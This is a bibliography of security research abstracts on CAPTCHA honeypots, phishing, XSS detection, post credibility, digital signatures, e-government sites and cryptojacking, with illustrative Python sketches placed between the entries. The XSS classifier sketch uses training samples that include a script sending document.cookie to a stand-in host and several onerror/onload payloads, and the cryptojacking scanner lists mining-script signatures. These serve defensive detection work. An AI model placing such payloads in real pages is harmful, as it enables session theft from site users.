Bibliography
Resistance to attacks aimed at breaking CAPTCHA challenges and usability, i.e., the effectiveness, efficiency, and satisfaction of human users in solving them, are the two major concerns when designing CAPTCHA schemes. User-friendliness, universality, and accessibility are related dimensions of usability that must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations, and transformations are added to text-based CAPTCHA challenges, reducing their usability. The extent of these deformations can be decreased if an additional security mechanism is incorporated into such challenges. This paper proposes an additional security mechanism that adds an extra layer of protection to any text-based CAPTCHA challenge, making it harder for bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text boxes for user entry of the CAPTCHA string, which serve as honeypots for bots and automated scripts. The honeypot technique tricks bots and automated scripts into filling in input fields that legitimate human users cannot fill in. The paper reports an implementation of the honeypot technique and the results of tests carried out over three months, during which form submissions were logged for analysis. The results demonstrate the effectiveness of the honeypot technique in improving both the security and the usability of text-based CAPTCHA challenges.
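As a rough illustration of the hidden-honeypot idea described in this abstract, the sketch below shows a minimal Flask form with a CSS-hidden text box and a server-side check that rejects any submission in which that hidden field is filled; the route and field names are illustrative assumptions, not taken from the paper.

# Minimal honeypot sketch (assumed Flask app; field/route names are hypothetical).
from flask import Flask, request, render_template_string

app = Flask(__name__)

FORM = """
<form method="post" action="/submit">
  <label for="captcha">Type the characters shown:</label>
  <input type="text" name="captcha" id="captcha">
  <!-- Honeypot: hidden from humans via CSS, but present in the DOM for bots -->
  <input type="text" name="captcha_confirm" style="display:none"
         tabindex="-1" autocomplete="off">
  <button type="submit">Submit</button>
</form>
"""

@app.route("/")
def show_form():
    return render_template_string(FORM)

@app.route("/submit", methods=["POST"])
def submit():
    # A human user never sees the hidden field, so any value in it
    # flags the submission as coming from a bot or automated script.
    if request.form.get("captcha_confirm", ""):
        return "Rejected: honeypot field was filled.", 400
    # ... continue with the normal CAPTCHA string verification here ...
    return "Accepted: proceed to CAPTCHA verification."

if __name__ == "__main__":
    app.run()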
The Internet is the most widely used technology in the current era of information technology and is embedded in daily life activities. Due to its extensive use in everyday life, it supports many applications, such as social media (Facebook, WhatsApp, Messenger, etc.) and other online applications such as online businesses, e-counseling, website advertising, e-banking, e-hunting websites, e-doctor appointments, and e-doctor opinions. These applications of Internet technology make things easy and accessible for human beings in limited time; however, the technology is vulnerable to various security threats. A vital and severe threat associated with this technology, or with a particular application, is the phishing attack, which attackers use to compromise network security. Phishing attacks include fake e-mails, fake websites, and fake applications that are used to steal users' credentials or compromise their security. This paper gives a detailed overview of various phishing attacks, specifically their background, and the solutions proposed in the literature to address these issues using techniques such as anti-phishing tools, honeypots, and firewalls. It also covers the installation of intrusion detection systems (IDS) and intrusion prevention systems (IPS) in networks to allow only authentic traffic in an operational network. In this work, we conducted an end-user awareness campaign to educate and train employees in order to minimize the probability of these attacks occurring. The analysis of results for this survey was very positive in terms of its effectiveness in addressing the aforementioned issues.
Cross-Site Scripting (XSS) is an attack most often carried out by attackers against a website by inserting malicious scripts into it. The attack takes the user to a web page that has been specifically designed to steal user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors evaluate several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). Each machine learning algorithm is then combined with an n-gram method applied to the script features to improve the performance of XSS attack detection. The simulation results show that the combination of SVM and n-grams achieves the highest accuracy, at 98%.
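To make the n-gram plus classifier pipeline in this abstract concrete, the following sketch feeds character n-grams into a linear SVM using scikit-learn; the tiny in-line samples and the chosen n-gram range are assumptions for illustration only, not the paper's dataset or exact settings.

# Character n-gram + SVM sketch for XSS detection (toy data, assumed settings).
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import make_pipeline
from sklearn.svm import LinearSVC

# Placeholder samples: 1 = script contains an XSS payload, 0 = benign markup.
scripts = [
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    "<img src=x onerror=alert(1)>",
    "<p>Welcome back, user!</p>",
    "<a href='/profile'>View profile</a>",
]
labels = [1, 1, 0, 0]

# Character n-grams capture payload fragments such as "<scr" or "onerror".
model = make_pipeline(
    CountVectorizer(analyzer="char", ngram_range=(2, 4)),
    LinearSVC(),
)
model.fit(scripts, labels)

# Classify an unseen payload with the trained pipeline.
print(model.predict(["<svg onload=alert(document.cookie)>"]))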
As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent, and use this information. The credibility of the information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources, and in certain situations pose a threat to human life. In this paper, we use an ensemble semi-supervised approach to determine the credibility of Reddit posts by estimating a reputation score for each post, in order to ensure the validity of the information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts use such systems to identify possible threats by analyzing data scattered across social media websites, forums, blogs, etc.
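The abstract describes the ensemble semi-supervised approach only at a high level; the sketch below is one hypothetical way such a scheme could look, with self-training wrapped around two base classifiers and their averaged probabilities used as a reputation score. The features, base models, and toy posts are assumptions, not the authors' actual method.

# Hypothetical ensemble of self-training classifiers producing a reputation score.
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB
from sklearn.semi_supervised import SelfTrainingClassifier

posts = [
    "New CVE exploited in the wild, patch immediately",   # labeled credible
    "This antivirus is a scam, download my fix instead",  # labeled not credible
    "Vendor confirms the vulnerability in an advisory",   # unlabeled
    "Free hack tool, just disable your firewall first",   # unlabeled
]
labels = np.array([1, 0, -1, -1])  # -1 marks unlabeled posts

X = TfidfVectorizer().fit_transform(posts)

# Each base learner is wrapped in a self-training loop that pseudo-labels
# confident unlabeled posts; the ensemble averages their probabilities.
base_models = [LogisticRegression(max_iter=1000), MultinomialNB()]
members = [SelfTrainingClassifier(m).fit(X, labels) for m in base_models]

# Average probability of the "credible" class serves as the reputation score.
reputation = np.mean([m.predict_proba(X)[:, 1] for m in members], axis=0)
print(reputation)  # higher values suggest more credible posts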
This paper presents a case study on the use and implementation of the Qualified Digital Signature. Issues such as the degree of use, the security and authenticity of the Qualified Digital Signature, and the publication and dissemination of digitally signed documents are analyzed. To support the case study, a methodology was adopted that included interviews with municipalities belonging to the Intermunicipal Community of the Leiria region, and a computer application was developed to determine which of the documents available on the municipalities' institutional websites were digitally signed. The results show that institutional websites already provide documentation with a Qualified Digital Signature and that the level of trust and authenticity regarding its use is considered mostly very positive.
With the development of new technologies around the world, governments tend to communicate with people and businesses with the help of such technologies. Electronic government (e-government) is defined as the use of information technologies such as electronic networks, the Internet, and mobile phones by organizations and state institutions in order to establish broad communication between citizens, businesses, and different state institutions. The development of e-government starts with creating a website to share information with users, which is considered the main infrastructure for further development. Website assessment is regarded as a way of improving service quality. Various international studies have introduced indexes for website assessment, but each considers only some dimensions of a website. In this paper, based on a careful review of previous studies, the most important indexes for website quality assessment are identified as "Web Design", "Navigation", "Services", "Maintenance and Support", "Citizens' Participation", "Information Quality", "Privacy and Security", "Responsiveness", and "Usability". Considering these indexes when designing a website facilitates user interaction with e-government websites.
Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model in which CPU resources are covertly used to "mine" a cryptocurrency in the browser. The impact is a surge in CPU usage and degraded system performance. In this research, an in-browser cryptojacking mitigation has been built as an extension for Google Chrome using the taint analysis method. The research method is attack modeling with an abuse case, using a Man-In-The-Middle (MITM) attack to test the mitigation. The proposed model is designed so that users are notified if a cryptojacking attack occurs; the user can then inspect the characteristics of the scripts that run in the website background. The results of this research show that taint analysis is a promising method for mitigating cryptojacking attacks. Out of 100 randomly sampled websites, the taint analysis method detected 19 websites infected with cryptojacking.
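The paper's mitigation is a Chrome extension that applies taint analysis to scripts at run time; as a much simpler stand-in, the sketch below performs a signature-based scan of a page for well-known mining libraries, just to illustrate the kind of script characteristics such a tool inspects. The URL and the signature patterns are illustrative assumptions, not the paper's detection logic.

# Simplified signature-based scan for in-browser mining scripts (not taint analysis).
import re
import urllib.request

MINING_SIGNATURES = [
    r"coinhive\.min\.js",      # classic in-browser Monero miner
    r"CoinHive\.Anonymous",
    r"cryptonight",            # mining algorithm frequently used in browsers
    r"wasm.*miner",
]

def scan_page(url):
    """Download a page and return the mining-related patterns it matches."""
    html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "ignore")
    return [p for p in MINING_SIGNATURES if re.search(p, html, re.IGNORECASE)]

if __name__ == "__main__":
    hits = scan_page("https://example.com")  # placeholder URL
    if hits:
        print("Possible cryptojacking indicators:", hits)
    else:
        print("No known mining signatures found.")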